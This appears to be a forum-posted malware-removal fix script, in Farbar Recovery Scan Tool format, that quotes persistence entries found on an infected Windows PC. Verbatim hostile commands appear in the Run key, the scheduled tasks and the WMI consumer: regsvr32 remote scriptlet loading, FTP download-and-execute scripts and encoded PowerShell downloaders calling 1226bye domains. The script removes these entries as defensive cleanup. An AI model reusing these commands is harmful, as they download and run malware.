Смотрите видео ниже, чтобы узнать, как установить наш сайт в качестве веб-приложения на домашнем экране.
Примечание: Эта возможность может быть недоступна в некоторых браузерах.
Start::
CreateRestorePoint:
HKLM-x32\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.1226bye.xyz:280/v.sct scrobj.dll <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{53d9ff6b-15cf-422a-b4d4-c084b9630edb} <==== ATTENTION (Restriction - IP)
BHO-x32: No Name -> {B69F34DD-F0F9-42DC-9EDD-957187DA688D} -> No File
CHR HKU\S-1-5-21-3609701947-2038354220-1547297221-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [dhdgffkkebhmkfjojejmpbldmpobfkfo] - hxxp://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx
S2 Ms7DB53800App; C:\Windows\System32\Ms7DB53800App.dll [X]
2019-02-17 11:05 - 2019-02-17 11:05 - 000221184 _____ (TODO: <公司名>) C:\Windows\system32\new.exe
2019-02-17 11:05 - 2019-02-17 11:05 - 000037888 _____ (Orgs) C:\Windows\system32\s.exe
2019-02-15 21:42 - 2019-02-17 11:05 - 000662528 _____ (Zhuhai Kingsoft Office Software Co.,Ltd) C:\Windows\system32\max.exe
2019-02-15 21:42 - 2019-02-17 11:04 - 000221184 _____ (TODO: <公司名>) C:\Windows\system32\upsupx.exe
2019-02-15 21:42 - 2019-02-17 11:04 - 000037888 _____ (Orgs) C:\Windows\system32\u.exe
2019-02-14 20:09 - 2019-02-17 11:05 - 000003504 _____ C:\Windows\System32\Tasks\Mysa3
2019-02-14 20:09 - 2019-02-17 11:05 - 000003424 _____ C:\Windows\System32\Tasks\Mysa2
2019-02-14 20:09 - 2019-02-17 11:05 - 000003186 _____ C:\Windows\System32\Tasks\ok
2019-02-14 20:08 - 2019-02-17 11:05 - 000003518 _____ C:\Windows\System32\Tasks\Mysa
2019-02-14 20:08 - 2019-02-17 11:05 - 000003190 _____ C:\Windows\System32\Tasks\Mysa1
2018-08-25 12:27 - 2019-01-07 14:46 - 000000086 _____ () C:\Program Files\Common Files\nsaok.dat
2018-03-16 13:34 - 2019-01-29 18:36 - 000000087 _____ () C:\Program Files\Common Files\xp.dat
2018-06-27 21:44 - 2019-02-17 11:04 - 000000084 _____ () C:\Program Files\Common Files\xpdown.dat
2017-12-26 15:13 - 2017-12-26 15:13 - 000091120 _____ () C:\Users\Andrey\AppData\Local\Temp\i4jdel0.exe
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> No File
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> No File
ShellIconOverlayIdentifiers: [00avg] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> No File
ContextMenuHandlers1: [GridinSoft Anti-Malware] -> {F77F27A6-89F3-471A-AFA8-3B280940A10C} => C:\PROGRA~1\GRIDIN~1\shellext.dll -> No File
ContextMenuHandlers2: [GridinSoft Anti-Malware] -> {F77F27A6-89F3-471A-AFA8-3B280940A10C} => C:\PROGRA~1\GRIDIN~1\shellext.dll -> No File
ContextMenuHandlers4: [GridinSoft Anti-Malware] -> {F77F27A6-89F3-471A-AFA8-3B280940A10C} => C:\PROGRA~1\GRIDIN~1\shellext.dll -> No File
ContextMenuHandlers6: [GridinSoft Anti-Malware] -> {F77F27A6-89F3-471A-AFA8-3B280940A10C} => C:\PROGRA~1\GRIDIN~1\shellext.dll -> No File
Task: {3717A82C-3BBE-4FC3-BEE4-3ECF744DD20A} - System32\Tasks\Mysa => cmd /c echo open ftp.1226bye.xyz>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe <==== ATTENTION
c:\windows\update.exe
Task: {7BB1C25F-F1EE-43D6-B439-290300DD5CC1} - System32\Tasks\Mysa3 => cmd /c echo open ftp.1226bye.xyz>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe <==== ATTENTION
c:\windows\help\lsmosee.exe
Task: {BDC4A8F0-AACF-4D78-9196-FC5009491E61} - System32\Tasks\ok => rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa
c:\windows\debug\ok.dat
Task: {D6A967B2-6A86-4DAE-9BB0-CEE187F32EB0} - System32\Tasks\Mysa2 => cmd /c echo open ftp.1226bye.xyz>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p <==== ATTENTION
Task: {DAAEE8C1-F9A6-4C36-AAC6-5287DC478A11} - System32\Tasks\Mysa1 => rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa <==== ATTENTION
c:\windows\debug\item.dat
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"fuckyoumm4\"",Filter="__EventFilter.Name=\"fuckyoumm3\":: <==== ATTENTION
WMI:subscription\__TimerInstruction->fuckyoumm2_itimer:: <==== ATTENTION
WMI:subscription\__IntervalTimerInstruction->fuckyoumm2_itimer:: <==== ATTENTION
WMI:subscription\__EventFilter->fuckyoumm3::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'] <==== ATTENTION
WMI:subscription\CommandLineEventConsumer->fuckyoumm4::[CommandLineTemplate => cmd /c powershell.exe -nop -enc "JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAAvADIALgB0AHgAdAAnACkALgB0AHIAaQBtACgAKQAgAC0AcwBwAGwAaQB (the data entry has 665 more characters).] <==== ATTENTION
AlternateDataStreams: C:\Users\Public\DRM:احتضان [98]
MSCONFIG\startupreg: Comrade.exe => C:\Program Files (x86)\GameSpy\Comrade\Comrade.exe
MSCONFIG\startupreg: qloader => C:\Users\Andrey\AppData\Roaming\ZZima\zzima_loader\nloader.exe -a
Reboot:
End::
???Может сейчас не будет, я посмотрю